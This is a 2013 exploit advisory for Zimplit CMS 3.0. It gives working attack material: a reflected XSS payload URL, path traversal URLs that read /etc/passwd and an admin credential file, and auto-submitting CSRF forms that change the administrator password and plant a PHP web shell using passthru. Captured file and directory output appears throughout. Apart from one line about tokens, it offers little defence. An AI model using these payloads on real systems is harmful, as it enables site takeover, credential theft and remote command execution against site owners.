##################################### # Exploit Title: Zimplit CMS multiple vulnerabilities # Date: 2013 13 September # Exploit Author: Yashar shahinzadeh # Special thanks to Mormoroth # Credit goes for: http://y-shahinzadeh.ir & ha.cker.ir # Vendor Homepage: www.zimplit.com # Tested on: Linux & Windows, PHP 5.3.2 # Affected Version : 3.0 (Last) # # Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir , http://Twitter.com/Mormoroth , http://mormoroth.ir } ##################################### Summary: ======== 1. XSS (Reflected) 2. CSRF / Directory traversal 3. CSRF / Local file disclosure 4. CSRF / Change administrator's password 5. CSRF / Upload a shell 6. CSRF / too much divastating actions to do 1. XSS (Reflected): =================== CMS suffers from cross site scripting due to lack of user's input sanitization: File: zimplit.php (line 535) ... ... } else { return 'Error: The file '.$file.' does not exist.'; } } ... ... Exploit: http://192.168.0.106/zimplit/zimplit.php?action=load&file=[XSS] http://192.168.0.106/zimplit/zimplit.php?action=load&file=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28944002%29%3C%2fScRiPt%3E 2. CSRF / Directory traversal: ============================== The following URL provides files' lists to attacker. Although it requires authorized user such as admin, with an appropriate javascript exploit an attacker is capable of having administrator's view of vulnerable link: http://192.168.0.106/zimplit/zimplit.php?action=listAllFiles&file=[Directory] File: zimplit.php (line 772 through 792) ... ... function listFilesDir($file) { if($file == ''){ $thedir = '.';} else { $thedir= $file;} if ($handle = opendir($thedir)) { while (false !== ($file = readdir($handle))) { if (is_dir($thedir.'/'.$file)) { if($thedir != '.'){ $files[] = $file.'|dir'; } else { if($file != '.' && $file != '..'){ $files[] = $file.'|dir'; } } } else { $files[] = $file.'|file'; } } closedir($handle); } return implode(';', $files); } ... ... Example: http://192.168.0.106/zimplit/zimplit.php?action=listAllFiles&file=../../../../ Results in: opt|dir;var|dir;tmp|dir;mnt|dir;proc|dir;boot|dir;sys|dir;..|dir;bin|dir;media|dir;srv|dir;dev|dir;vmlinuz|file;lost+found|dir;lib|dir;usr|dir;cdrom|dir;initrd.img|file;root|dir;sbin|dir;build|dir;home|dir;etc|dir;selinux|dir;.|dir 3. CSRF / Local file disclosure: ================================ The CMS suffers from LFD, like example above appropriate exploitation would be very harmful: File: zimplit.php (line 521 through 537) ... ... function getHTML($file) { if (is_file($file)) { if (is_readable($file)) { $content = file_get_contents($file); if ($content === FALSE) { return 'Error: Cannot read from the file '.$file.'.'; } return $content; } else { return 'Error: The file '.$file.' is not readable.'; } } else { return 'Error: The file '.$file.' does not exist.'; } } ... ... Exploit: http://192.168.0.106/zimplit/zimplit.php?action=load1&file=[Path to file] Examples: http://192.168.0.106/zimplit/zimplit.php?action=load1&file=../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:107::/var/run/dbus:/bin/false avahi-autoipd:x:103:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false avahi:x:104:111:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false couchdb:x:105:113:CouchDB Administrator,,,:/var/lib/couchdb:/bin/bash speech-dispatcher:x:106:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh usbmux:x:107:46:usbmux daemon,,,:/home/usbmux:/bin/false haldaemon:x:108:114:Hardware abstraction layer,,,:/var/run/hald:/bin/false kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:110:115:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:111:117:RealtimeKit,,,:/proc:/bin/false saned:x:112:118::/home/saned:/bin/false hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false gdm:x:114:120:Gnome Display Manager:/var/lib/gdm:/bin/false yasho:x:1000:1000:Yasho,,,:/home/yasho:/bin/bash vboxadd:x:999:1::/var/run/vboxadd:/bin/false mysql:x:115:123:MySQL Server,,,:/var/lib/mysql:/bin/false sshd:x:116:65534::/var/run/sshd:/usr/sbin/nologin jetty:x:117:124::/usr/share/jetty:/bin/false smmta:x:118:125:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false smmsp:x:119:126:Mail Submission Program,,,:/var/lib/sendmail:/bin/false Following exploit would lead to gathering administrator's username and password: http://192.168.0.106/zimplit/zimplit.php?action=load1&file=security.php <?php $u="yashar"; $p="dd0eaddc303999363896ceaad3458ecc"; $e="y.shahinzadeh@gmail.com"; $s="7xftg9by0nh97wso7pmd"; $r=""; ?> 4. CSRF / Change administrator's password: ========================================== Following exploit results in changing administrator's credentials: <html> <body onload="submitForm()"> <form name="myForm" id="myForm" action="http://192.168.0.106/zimplit/zimplit.php?action=changeuserpass" method="post"> <input type="hidden" name="username" value="yashar"> <input type="hidden" name="password" value="yashar"> <input type="hidden" name="content" value="y.shahinzadeh@gmail.com"> </form> <script type='text/javascript'>document.myForm.submit();</script> </html> A random token would be a good prevention. 5. CSRF / Upload a shell ========================================== Exploitation of this hole is semi complicated compared with previous ones, it has two steps must be taken separately. Firstly, a blank file must be created on the remote machine. Afterwards, the malisious contents are injected into it: <html> <img src="http://192.168.0.106/zimplit/zimplit.php?action=new&file=shell.php" width="1" height="1"> <body onload="submitForm()"> <form name="myForm" id="myForm" action="http://192.168.0.106/zimplit/zimplit.php?action=save&file=shell.php" method="post"> <input type="hidden" name="html" value="<?php passthru('ls -la'); ?>"> </form> <script type='text/javascript'>document.myForm.submit();</script> </html> total 608 drwxrwxrwx 7 yasho yasho 4096 Sep 13 04:27 . drwxr-xr-x 13 yasho yasho 4096 Sep 13 02:45 .. -rw-r--r-- 1 www-data www-data 77873 Sep 13 02:14 58.zip drwxrwxrwx 2 www-data www-data 4096 Sep 13 02:14 Z-files drwxrwxrwx 2 www-data www-data 4096 Sep 13 02:14 Z-pictures drwxrwxrwx 2 yasho yasho 4096 Sep 23 2009 Z-scripts -rwxrwxrwx 1 yasho yasho 845 Sep 22 2009 Zconfig.php -rw-r--r-- 1 www-data www-data 274 Sep 13 02:14 Zmenu.js -rw-r--r-- 1 www-data www-data 86 Sep 13 02:14 Zsettings.js drwxrwxrwx 7 yasho yasho 4096 Sep 23 2009 editor drwxr-xr-x 2 www-data www-data 4096 Sep 13 02:14 images -rw-r--r-- 1 www-data www-data 5789 Sep 13 02:14 index.html -rw-r--r-- 1 www-data www-data 124 Sep 13 03:02 security.php -rw-rw-rw- 1 www-data www-data 28 Sep 13 04:27 shell.php -rw-r--r-- 1 yasho yasho 7 Sep 13 02:16 test.txt -rwxrwxrwx 1 yasho yasho 37633 Sep 24 2009 zimplit.php -rwxrwxrwx 1 yasho yasho 437955 Sep 13 00:58 zimplit_cms_3.0_standalone.zip 6. CSRF / too much divastating actions to do: ============================================= I'm sure there will be more attacks, I just indicate some important ones. /** Yasshar shahinzadeh **/